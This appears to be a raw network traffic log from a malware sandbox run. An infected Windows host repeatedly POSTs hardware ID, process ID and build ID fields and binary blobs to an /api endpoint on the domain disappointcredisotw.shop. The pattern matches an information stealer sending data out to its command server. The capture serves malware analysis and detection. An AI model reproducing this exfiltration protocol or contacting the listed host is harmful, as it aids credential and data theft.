2024-06-23 22:10:49 UTC	1369	IN	Data Raw: 42 70 55 78 77 6c 71 79 5a 44 51 4a 32 53 48 72 37 47 51 36 73 62 36 50 66 4f 55 62 6b 35 6c 53 78 38 7a 33 38 6c 56 30 64 76 72 58 44 32 68 61 58 79 4c 31 64 6f 76 49 74 50 73 39 4e 53 6c 67 4c 73 2b 35 64 6f 79 41 43 4e 72 46 54 2f 4c 67 57 44 56 33 2b 31 54 4b 75 77 67 62 4d 57 34 76 45 41 39 6e 61 33 32 6d 4b 75 61 75 58 6e 7a 6e 32 56 51 59 6c 63 58 4d 73 76 50 55 4e 44 63 34 46 6f 38 71 57 56 2b 68 64 62 51 4b 43 7a 62 37 50 2b 59 34 63 48 2f 4f 72 33 55 4b 41 4a 6b 58 56 4a 6b 6d 34 4e 6b 31 64 58 6b 52 6a 2b 69 49 6a 47 55 6e 72 39 41 54 38 61 76 73 5a 50 6e 67 71 4e 37 76 5a 42 73 54 32 70 4f 46 54 54 56 30 56 37 5a 30 75 70 54 4f 71 5a 68 65 34 48 57 32 53 6f 6a 32 75 72 6a 6d 75 44 50 2b 44 50 37 32 69 51 41 49 30 49 4b 66 49 47 42 46 66 6a 53 Data Ascii: BpUxwlqyZDQJ2SHr7GQ6sb6PfOUbk5lSx8z38lV0dvrXD2haXyL1dovItPs9NSlgLs+5doyACNrFT/LgWDV3+1TKuwgbMW4vEA9na32mKuauXnzn2VQYlcXMsvPUNDc4Fo8qWV+hdbQKCzb7P+Y4cH/Or3UKAJkXVJkm4Nk1dXkRj+iIjGUnr9AT8avsZPngqN7vZBsT2pOFTTV0V7Z0upTOqZhe4HW2Soj2urjmuDP+DP72iQAI0IKfIGBFfjS
2024-06-23 22:10:49 UTC	1369	IN	Data Raw: 77 36 4d 63 76 6b 30 43 63 70 30 4b 2f 45 6c 2b 58 4d 2f 43 2b 39 32 48 55 4d 43 79 35 35 4a 5a 75 44 55 74 71 52 75 78 5a 38 6f 47 74 7a 67 4e 72 54 4b 79 50 53 36 50 4b 54 36 4d 2f 38 4d 2f 4f 64 62 6b 35 71 53 42 51 38 33 73 64 51 78 4e 54 71 57 44 44 73 4c 44 48 4c 31 38 39 72 66 4a 32 74 33 70 50 39 77 64 51 36 37 4a 4d 71 41 48 77 4c 65 6c 65 79 32 68 65 57 31 75 38 55 5a 4f 34 69 64 49 37 59 33 43 30 73 33 2f 2f 30 6d 75 44 44 38 54 2f 38 6c 32 5a 45 59 30 51 53 4f 74 58 44 55 74 48 44 38 56 45 36 76 6d 67 7a 78 5a 4b 58 4c 44 79 66 74 62 50 55 33 64 4c 73 4b 4f 76 59 58 30 46 74 53 78 55 71 6d 59 46 4b 6d 4c 6d 49 50 79 58 75 49 6e 53 48 6b 49 39 70 5a 4e 54 74 2f 5a 50 6a 78 50 38 78 38 70 56 6a 55 47 4a 4a 48 43 37 65 77 31 7a 59 33 75 39 64 4d Data Ascii: w6Mcvk0Ccp0K/El+XM/C+92HUMCy55JZuDUtqRuxZ8oGtzgNrTKyPS6PKT6M/8M/Odbk5qSBQ83sdQxNTqWDDsLDHL189rfJ2t3pP9wdQ67JMqAHwLeley2heW1u8UZO4idI7Y3C0s3//0muDD8T/8l2ZEY0QSOtXDUtHD8VE6vmgzxZKXLDyftbPU3dLsKOvYX0FtSxUqmYFKmLmIPyXuInSHkI9pZNTt/ZPjxP8x8pVjUGJJHC7ew1zY3u9dM
2024-06-23 22:10:49 UTC	1369	IN	Data Raw: 48 6b 49 39 70 5a 4e 62 6b 34 35 72 6c 79 2f 59 2f 39 5a 31 6b 54 32 68 44 47 54 76 65 78 56 6a 65 33 4f 5a 58 50 61 68 6f 59 59 6a 62 33 53 59 75 6e 36 4f 7a 31 4f 7a 61 75 32 47 2f 32 6b 31 4f 53 6c 55 4a 4c 73 2b 44 46 38 6d 66 69 7a 39 58 74 53 41 7a 6a 4e 79 58 63 32 61 66 37 76 36 64 35 4d 72 7a 4e 76 4b 65 5a 45 52 6c 53 42 63 7a 30 39 46 64 32 4e 7a 6f 57 7a 65 2b 59 6e 36 50 33 4e 4d 6a 4c 39 57 74 76 39 61 72 78 65 4e 35 70 64 67 71 64 32 35 4b 45 6a 2f 50 67 78 66 4a 6e 34 73 2f 56 37 55 67 4d 34 7a 63 6c 33 4e 6d 6e 2b 48 2f 6c 4f 54 4f 39 7a 4c 31 6d 32 5a 4d 5a 45 41 62 4e 4e 48 52 56 4e 4c 5a 34 6c 6f 7a 72 57 5a 32 6a 74 54 51 4c 79 4c 51 72 62 2f 57 71 38 58 6a 65 61 58 59 4b 6d 31 45 63 46 41 64 34 34 4d 58 79 5a 2b 4c 50 31 65 31 49 44 Data Ascii: HkI9pZNbk45rly/Y/9Z1kT2hDGTvexVje3OZXPahoYYjb3SYun6Oz1Ozau2G/2k1OSlUJLs+DF8mfiz9XtSAzjNyXc2af7v6d5MrzNvKeZERlSBcz09Fd2NzoWze+Yn6P3NMjL9Wtv9arxeN5pdgqd25KEj/PgxfJn4s/V7UgM4zcl3Nmn+H/lOTO9zL1m2ZMZEAbNNHRVNLZ4lozrWZ2jtTQLyLQrb/Wq8XjeaXYKm1EcFAd44MXyZ+LP1e1ID
2024-06-23 22:10:49 UTC	1369	IN	Data Raw: 61 79 76 53 2f 2f 32 62 36 38 50 34 50 66 61 64 62 45 52 69 52 68 63 2f 33 4d 56 55 31 74 33 70 55 7a 53 6d 62 48 36 4e 31 4e 45 74 5a 4a 47 76 73 5a 50 7a 67 71 4e 37 76 61 68 6e 54 47 70 47 46 44 48 50 36 32 53 57 6b 2f 77 61 56 4d 63 4a 61 73 6d 51 30 43 64 6b 68 36 2b 78 6b 4f 44 4b 39 7a 7a 31 6e 32 74 4b 61 55 30 64 4d 38 76 43 57 74 2f 57 36 46 6b 7a 6f 6d 64 39 6d 64 66 63 49 43 7a 57 34 2f 66 55 70 59 43 37 50 75 58 61 4d 67 41 6a 63 78 45 79 30 74 4a 61 31 64 32 6a 46 69 50 69 43 68 6a 67 79 5a 56 72 49 39 4f 74 71 64 61 72 79 50 41 39 2f 70 35 76 54 57 4a 45 46 43 37 65 79 6b 66 59 33 4f 78 63 4e 4b 56 6a 64 34 37 64 30 53 63 75 33 75 72 2f 6d 75 4f 43 74 58 75 39 6e 58 49 43 4f 77 64 53 48 63 6e 59 52 38 44 63 77 6c 6b 7a 37 43 42 73 78 62 69 Data Ascii: ayvS//2b68P4PfadbERiRhc/3MVU1t3pUzSmbH6N1NEtZJGvsZPzgqN7vahnTGpGFDHP62SWk/waVMcJasmQ0Cdkh6+xkODK9zz1n2tKaU0dM8vCWt/W6Fkzomd9mdfcICzW4/fUpYC7PuXaMgAjcxEy0tJa1d2jFiPiChjgyZVrI9OtqdaryPA9/p5vTWJEFC7eykfY3OxcNKVjd47d0Scu3ur/muOCtXu9nXICOwdSHcnYR8Dcwlkz7CBsxbi
2024-06-23 22:10:49 UTC	1369	IN	Data Raw: 4b 4f 5a 2f 34 44 62 75 58 6e 36 6c 69 6f 61 49 51 55 63 4e 64 6a 4c 57 39 72 5a 35 30 59 38 70 32 74 38 69 74 2f 58 4b 43 58 56 35 65 4f 53 36 38 6e 7a 50 76 57 65 5a 46 42 69 53 6c 4a 79 6d 34 4e 53 7a 70 47 37 46 6e 79 64 64 48 53 4d 33 35 55 43 49 38 54 73 2b 35 66 67 7a 72 74 37 34 74 51 43 4b 51 68 63 55 48 7a 65 7a 78 57 4f 6b 36 4e 5a 4d 4b 46 6d 59 59 66 51 31 79 49 6a 31 66 2f 2b 6d 2b 62 42 2b 7a 7a 76 6d 33 68 4e 61 45 41 52 4f 4e 62 4d 57 64 37 62 6f 78 70 2b 37 47 56 72 79 34 69 56 61 77 6a 63 2f 50 76 57 7a 4e 6a 74 50 76 47 4c 59 55 39 76 42 56 41 6a 6c 36 73 2b 76 63 69 68 46 44 75 67 49 69 76 4a 6b 4e 63 71 4b 63 33 6f 38 4a 37 68 7a 2f 4d 32 2b 4a 39 6c 52 6d 64 4f 48 43 37 58 7a 46 58 51 32 75 4a 52 50 36 64 6f 66 59 4c 43 6c 32 56 6d Data Ascii: KOZ/4DbuXn6lioaIQUcNdjLW9rZ50Y8p2t8it/XKCXV5eOS68nzPvWeZFBiSlJym4NSzpG7FnyddHSM35UCI8Ts+5fgzrt74tQCKQhcUHzezxWOk6NZMKFmYYfQ1yIj1f/+m+bB+zzvm3hNaEARONbMWd7boxp+7GVry4iVawjc/PvWzNjtPvGLYU9vBVAjl6s+vcihFDugIivJkNcqKc3o8J7hz/M2+J9lRmdOHC7XzFXQ2uJRP6dofYLCl2Vm
2024-06-23 22:10:49 UTC	598	IN	Data Raw: 72 35 77 2f 45 31 2f 4a 31 74 53 58 46 4f 41 44 66 52 77 46 76 65 32 4f 4e 61 50 4b 31 76 63 38 75 65 6c 57 73 6a 78 36 32 70 31 71 76 6e 32 43 37 72 6b 43 68 68 64 46 4d 59 4f 39 58 56 58 74 66 53 39 56 6b 73 37 43 42 73 78 62 69 38 51 44 32 64 72 66 61 59 71 35 71 35 65 66 61 56 5a 45 39 6f 51 52 73 35 30 63 42 51 30 39 76 76 57 44 32 6b 61 33 6d 4f 31 64 45 68 4a 39 48 69 38 4a 6a 76 79 2f 55 77 76 64 51 6f 41 6d 52 64 55 6d 53 62 67 32 50 47 31 76 74 5a 4c 4f 35 51 63 4a 72 42 77 69 59 30 32 61 2f 65 6c 2b 66 42 2f 6a 37 74 32 69 68 64 4c 53 31 35 56 38 43 42 46 64 48 64 6f 77 78 2b 37 47 4a 33 68 39 50 51 4a 53 76 53 34 76 61 66 35 4d 6a 31 4b 2f 4b 66 59 6b 35 72 53 41 41 32 30 39 46 63 33 39 7a 74 58 43 36 76 49 6a 33 4a 6b 4e 41 7a 5a 49 65 76 73 Data Ascii: r5w/E1/J1tSXFOADfRwFve2ONaPK1vc8uelWsjx62p1qvn2C7rkChhdFMYO9XVXtfS9Vks7CBsxbi8QD2drfaYq5q5efaVZE9oQRs50cBQ09vvWD2ka3mO1dEhJ9Hi8Jjvy/UwvdQoAmRdUmSbg2PG1vtZLO5QcJrBwiY02a/el+fB/j7t2ihdLS15V8CBFdHdowx+7GJ3h9PQJSvS4vaf5Mj1K/KfYk5rSAA209Fc39ztXC6vIj3JkNAzZIevs
2024-06-23 22:10:49 UTC	1369	IN	Data Raw: 32 36 37 36 0d 0a 48 61 67 36 6d 51 55 72 32 56 4b 68 6f 68 66 46 49 31 33 74 68 45 77 4e 7a 7a 55 33 79 54 4c 42 76 67 75 37 78 72 50 4a 2b 31 73 39 54 65 77 66 55 33 2b 6f 78 37 44 30 52 54 47 44 76 4a 78 45 4c 5a 6b 61 30 38 56 38 63 4a 4d 34 32 51 6a 32 6c 33 6b 59 57 61 2f 34 43 43 2f 79 69 39 77 69 67 53 4d 52 35 48 62 34 36 54 42 37 36 36 69 45 74 79 78 41 6b 59 6b 72 69 38 51 45 2b 66 2b 37 48 4d 71 5a 43 31 55 5a 62 78 41 51 4a 78 42 55 70 2b 6d 59 52 57 78 4d 50 6c 56 79 71 76 4a 55 32 31 39 38 30 6d 49 73 6a 38 7a 36 72 73 32 50 59 2f 36 6f 73 6d 56 32 42 4c 48 44 76 50 67 78 75 2b 75 6f 67 2f 66 4b 4d 69 4b 38 6e 70 6c 32 4e 6b 34 4b 4f 5a 2f 34 43 70 75 79 47 39 77 69 67 43 56 6b 59 63 4d 74 37 56 52 4a 76 32 2b 56 6b 36 75 33 4d 7a 78 62 69 Data Ascii: 2676Hag6mQUr2VKhohfFI13thEwNzzU3yTLBvgu7xrPJ+1s9TewfU3+ox7D0RTGDvJxELZka08V8cJM42Qj2l3kYWa/4CC/yi9wigSMR5Hb46TB766iEtyxAkYkri8QE+f+7HMqZC1UZbxAQJxBUp+mYRWxMPlVyqvJU21980mIsj8z6rs2PY/6osmV2BLHDvPgxu+uog/fKMiK8npl2Nk4KOZ/4CpuyG9wigCVkYcMt7VRJv2+Vk6u3Mzxbi
2024-06-23 22:10:49 UTC	1369	IN	Data Raw: 75 62 2b 68 75 58 46 74 43 6a 72 6c 33 70 42 5a 6b 4a 65 4e 4d 6a 4f 57 5a 61 66 6f 52 51 70 70 32 35 31 68 73 57 59 4f 6a 4c 63 2b 2f 62 59 34 39 50 32 4e 62 32 6c 4a 43 6f 49 4c 6e 6c 38 77 59 4d 4e 6c 4a 48 57 56 7a 4b 69 5a 57 57 61 6e 66 63 67 4b 4e 7a 68 38 4a 4f 72 6a 4a 4e 53 6c 76 45 71 52 43 4d 64 55 47 2b 58 71 7a 36 39 75 71 4e 51 4c 65 77 36 4d 64 75 43 6a 48 35 33 69 4c 32 6a 2f 49 43 70 35 48 65 56 38 51 46 62 43 79 35 35 56 35 6e 56 46 59 36 54 73 52 70 55 78 77 6b 59 79 38 4b 58 63 32 61 66 71 76 4b 47 2b 63 54 34 4c 2f 37 64 56 48 78 69 53 42 31 77 31 38 68 56 30 63 48 31 54 33 43 6b 59 57 6d 52 37 75 6b 41 4b 4e 6e 71 36 35 50 74 35 4e 74 35 73 2f 49 42 4b 51 67 46 48 58 79 42 67 57 79 57 6d 61 4e 72 63 73 51 4a 47 4f 43 51 7a 32 74 38 Data Ascii: ub+huXFtCjrl3pBZkJeNMjOWZafoRQpp251hsWYOjLc+/bY49P2Nb2lJCoILnl8wYMNlJHWVzKiZWWanfcgKNzh8JOrjJNSlvEqRCMdUG+Xqz69uqNQLew6MduCjH53iL2j/ICp5HeV8QFbCy55V5nVFY6TsRpUxwkYy8KXc2afqvKG+cT4L/7dVHxiSB1w18hV0cH1T3CkYWmR7ukAKNnq65Pt5Nt5s/IBKQgFHXyBgWyWmaNrcsQJGOCQz2t8

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	52914	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:50 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 13664 Host: disappointcredisotw.shop
2024-06-23 22:10:50 UTC	13664	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 57 57 58 4c 46 2d 2d 34 35 31 35 0d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DWWXLF--4515
2024-06-23 22:10:51 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6gmo9n2ptq6deem5pe4bm08bjj; expires=Thu, 17-Oct-2024 15:57:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdA9c9PZ1y%2B96nOOERI2XJ2GxSP7e31rjgbqo%2BWhSsUb18IE6krgqHgyL6TOXZ8mILl%2FFxGRRyihU4RqAYhFyP9TgU3FTmMJLct4tOWcdZCLW1LP6DRuvk%2B5%2FBSZVI%2FxhrvpcuVFdMzGORg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf7c9bb18ce8-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:51 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.5	52917	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:51 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15076 Host: disappointcredisotw.shop
2024-06-23 22:10:51 UTC	15076	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 57 57 58 4c 46 2d 2d 34 35 31 35 0d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DWWXLF--4515
2024-06-23 22:10:52 UTC	810	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q32662fftjdju0h87ol2650n6i; expires=Thu, 17-Oct-2024 15:57:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DpZ480LL84NPpQgd7RXUxLI1ygGKsvVF%2FoezjRDtUa21Db6c2ZP0jzADbOOK4Cs2mlU8GFfJfNoiVc4SOyqQUL6OB%2FmEfraWIBtnKEhvMQJLA2jrbKwsBuHBDMSOCrIb1WzaSN%2BRbC7jLn8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf829baa180d-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:52 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	52920	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:52 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20566 Host: disappointcredisotw.shop
2024-06-23 22:10:52 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 57 57 58 4c 46 2d 2d 34 35 31 35 0d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DWWXLF--4515
2024-06-23 22:10:52 UTC	5235	OUT	Data Raw: 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6vMMZh'F3Wun 4F([:7s~X`nO
2024-06-23 22:10:53 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jifok4ss044gfupunnm1jcicsj; expires=Thu, 17-Oct-2024 15:57:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5i8xPSi1s1ZY9VjrIAme4t0VFt8pvEzxwa8nlqjOPhWVwtjPS%2FLb4MSeEvHZsKDa1iI%2BuaCrs7U9TgIC459c%2Fa28gTm6pmvuK8rsRl16S%2FCVBHZAkeZQN8D%2FmekPohUj2o8jNxPv8%2FGkQRo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf889ca60cb0-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:53 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.5	52923	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:54 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5449 Host: disappointcredisotw.shop
2024-06-23 22:10:54 UTC	5449	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 37 36 42 32 36 41 39 36 46 35 31 30 41 35 38 41 36 36 42 45 38 43 45 35 34 38 30 35 43 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 44 57 57 58 4c 46 2d 2d 34 35 31 35 0d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9376B26A96F510A58A66BE8CE54805CF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"DWWXLF--4515
2024-06-23 22:10:54 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 23 Jun 2024 22:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8uihmqns77vp3upjr5lke7g307; expires=Thu, 17-Oct-2024 15:57:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecLpQAIxdUUvrZe%2FVsp2lw2lyVBJNJDI4H0DoaBC%2FbgDL1APGT3Z3Z8Si1vOxggMESTMuI7uGv5bINVgkNnSprpDHtP3gNEI7dtCxCd7NqvJmL9vkmoaPtcmbFtqUyPNfyPAWgTCWmk4ABY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8987cf8fea4a41d9-EWR alt-svc: h3=":443"; ma=86400
2024-06-23 22:10:54 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-06-23 22:10:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	52926	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-06-23 22:10:54 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1280 Host: disappointcredisotw.shop
